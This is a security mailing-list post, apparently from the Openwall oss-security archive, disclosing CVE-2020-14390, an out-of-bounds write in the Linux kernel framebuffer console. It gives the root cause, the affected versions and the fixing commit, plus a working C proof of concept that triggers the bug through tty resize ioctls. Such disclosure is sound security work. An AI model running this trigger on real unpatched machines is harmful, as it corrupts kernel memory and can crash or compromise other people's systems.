Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAH5WSp7F86OfgeOLROT7bGwH1jkTivrHp6KOsEnsHDaEq166AQ@mail.gmail.com>
Date: Tue, 15 Sep 2020 18:23:20 +0800
From: Minh Yuan <yuanmingbuaa@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-2020-14390: Linux kernel: slab-out-of-bounds in fbcon

Hi,

I found a out-of-bound write in fbcon_redraw_softback while the kernel
version <= 5.9.rc5. The oldest affected kernel version is 2.2.3.
The root cause of this vulnerability is that the value of vc->vc_origin is
not updated in time while invoking vc_do_resize.

This is my PoC (need the permission to open and write the tty, and need to
have a fbcon driver):

// author by ziiiro@thu
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>


int main(int argc, char** argv)
{
        int fd = open("/dev/tty1", O_RDWR, 0);
        unsigned short size1[3] = {3, 0x21, 0};
        ioctl(fd, 0x5609, size1); // VT_RESIZE
        for (int i = 0; i < 30; i++) {
            write(fd, "\x0a", 1);
        }

        signed int args[3] = {13, -5, 0};
        ioctl(fd, 0x541c, args); // TIOCLINUX
        unsigned short size2[3] = {3, 0x39, 0};
        ioctl(fd, 0x5609, size2); // VT_RESIZE
}


This is the commit to patch the issue:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50145474f6ef4a9c19205b173da6264a644c7489

Thanks,
Yuan Ming, Tsinghua University

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.